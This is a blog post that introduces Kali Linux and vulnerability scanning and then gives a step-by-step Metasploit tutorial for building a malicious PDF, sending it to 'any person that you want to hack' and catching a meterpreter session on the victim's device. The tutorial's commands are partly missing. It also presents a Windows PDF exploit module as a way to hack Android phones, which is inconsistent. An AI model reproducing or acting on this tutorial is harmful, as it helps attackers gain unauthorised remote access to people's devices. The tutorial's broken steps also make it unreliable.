The Blog

Why Kali Linux?

If you are interested in penetration testing or cyber security stuff you need some specific tools to perform some tasks which come pre-installed and settled up in Kali Linux so you may directly use them without doing any configuration. Or in case if one wants to check the vulnerabilities on a website or want to know security-related bugs in any application then it is great to go with Kali Linux.

Many people think that Kali is a tool for hacking or cracking social accounts or web servers. This is one of the biggest myths about Kali Linux. Kali Linux is just another Debian distribution with a bunch of networking and security tools. It is a weapon to train or defend yourself not to attack anyone. Kali Linux was designed mainly for professionals. It is for those who want to get their hands in Penetration Testing, Cyber Security, or Ethical Hacking. It is a powerful tool and in case, not used properly, it may lead to losses even.

What is Vulnerability Scanning in Kali Linux?

To understand, first, it is important to know what is vulnerability. So, in the field of Cyber Security, the vulnerability can be defined as the weakness of the computer system which can be exploited by attacking the system to perform unauthorized actions and for gaining unauthorized access to a system. The attacker can be do almost anything with the system such as data breaching (stealing sensitive information), installing malware on the system, etc.

Now, let us understand what is Vulnerability Scanning. Vulnerability Scanning is the process of searching for vulnerabilities in a computer system. It is done by a Vulnerability Scanner. A vulnerability scanner is a software designed for testing applications or computers for vulnerabilities. It identifies and creates a directory for each process connected to the system (eg. firewalls, servers, networks, etc). Vulnerabilities are identified from misconfigurations and flawed programming within a given network. The probability of risks in a system is identified by the vulnerabilities present.

Working of Vulnerability Scanning

The vulnerability scanning works on a three-step procedure. They are as follows:

  • Vulnerabilities Identification
  • Analysis of the risk possessed by vulnerabilities found
  • Operations against the identifies Vulnerability
  1. Vulnerabilities Identification: – Vulnerabilities can be identified by the Vulnerability Scanner. The efficiency of the vulnerability scanner depends on the ability to gather information on the system, identify the open ports, devices, etc.
  2. Analysis of the risk possessed by vulnerabilities found: – This step is very crucial for the team who are performing the vulnerability scanning. This step decides:
  • The critical impact on the system if the vulnerability is exploited.
  • The Easiness in exploiting the vulnerability
  • Whether the security measures that are already present are sufficient for reducing the risk of vulnerability
  1. Operations against the identified Vulnerability: – The vulnerabilities identified by the scanner must be patched or fixed so that they can no longer harm the system or can be exploited by the attacker. But, a simple fix is not available for the vulnerability; therefore, we have two choices:
  • The vulnerability can be ignored. This can be done when risk is low.
  • The second option can is the vulnerable system can be ceased, or other security measures can be added so that the vulnerability cannot be exploited.

Types of Scanning

  1. External Vulnerability Scanning: – This type of scanning is carried out from outside the network of an organization. This scan targets the areas that are connected to the internet or the applications that are needed by external users or customers.
  2. Internal Vulnerability Scanning: – This type of scan is carried out from inside the organization. Its target is to successfully identify and detect vulnerabilities that can be exploited by an attacker. An attacker can be anyone who wants to gain unauthorized access or can be employees from inside the organization who have access to the sensitive information of the organization.
  3. Unauthorized Scanning: –This type of scanning searches for vulnerabilities within an organization’s network perimeter.
  4. Authorized Scanning: –This type of scanning allows the vulnerability scanners to probe inside a network by providing them with privileged credentials to check for weak passwords, misconfigured, or flawed programming of applications, or misconfigured database.

Security Measures

Here, are the security measures that are taken by the cyber security team to ensure that malware and vulnerabilities are less likely to be identified by any kind of attack.

  1. Breach and Attack Simulation (BAS) Technology: To test network defenses, the BAS technology itself tends to be an attacker. The tools run various scans and attacks to check for the capabilities for the prevention, detection, and efficiency of the defense of the targeted network.
  2. Application Security Testing: This type of testing is done to ensure the correct working of the application, to prevent critical data from exposing to external threats, to check the misconfiguration in the application’s code. It is done to check the security of the application, weaknesses, and vulnerabilities. It helps to identify and prevent vulnerabilities exploitation,

Vulnerability Scanners

Listed below are some of the open-source Vulnerability Scanners.

  • OpenVAS
  • Nexpose Community
  • Metasploit Framework
  • Wireshark
  • Aircrack -ng
  • Nikto
  • Retina

How To Hack Android Phone By PDF File Using Metasploit Framework


  1. Termux app (Download it from Play store).
  2. Install Metasploit Framework in TermuX
  3. TermuX should be allowed to use External Storage (For this enter the command: “termux-setup-storage”).
  4. (Recommended not necessary) Use Hacker`s keyboard for entering commands in TermuX easily.

Once you have completed all requirements we are ready to perform the hack.

Hacking Android Using Metasploit via a PDF File:-

Step 1:- Launch Metasploit Console

First of all open Termux, if you are on android or just open your terminal if on Desktop.

Enter the following command to open Metasploit Console


If this kind of screen appears in front of you then we are good and if not there might be problem in installation of metasploit.

Step 2:– Creating the Evil PDF (Payload)

Type the commands given below or simply copy paste them one by one to create the PDF File.

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Then you have to set your Localhost. For this you will need your IP Address, to check your IP Address type


in new seesion on termux or in another terminal window. Now come to your metasploit console and set your Localhost like this –


Replace the IP Address given in above command by your own IP Address

Now it’s time to setup port for this enter this command –

Set LPORT 4444

You are free to use any port you want like 4564, 8080 etc.

Now its time to generate the Evil PDF File do this by below command –

Set filename MyDocument.pdf

Here, you are also free to use any name you want just put it in place of MyDocument but be sure to put .pdf at the end of its name.

Now the last command is for final creation of file do this by typing this command –


Now within a second a message will be displayed saying that your PDF File is created at any default location. First copy that PDF File to your either Internal or External storage like this

mv <fille_location> <new_location>

And now you are done with creation part. Send it to any person that you want to hack. As soon as he/she will open that pdf file you will get the metasploit session.

Step 3:- Exploitation

First open your metasploit console by typing


and then start writing below mentioned command –

use exploit/multi/handler/

Set LHOST <your_IP>

Set LPORT 4444


Note – Make sure to enter same IP and Port as you entered above in Step 2.

It will some time and then BOOM you will get meterpreter session. If such output appears then you got access to victim’s phone.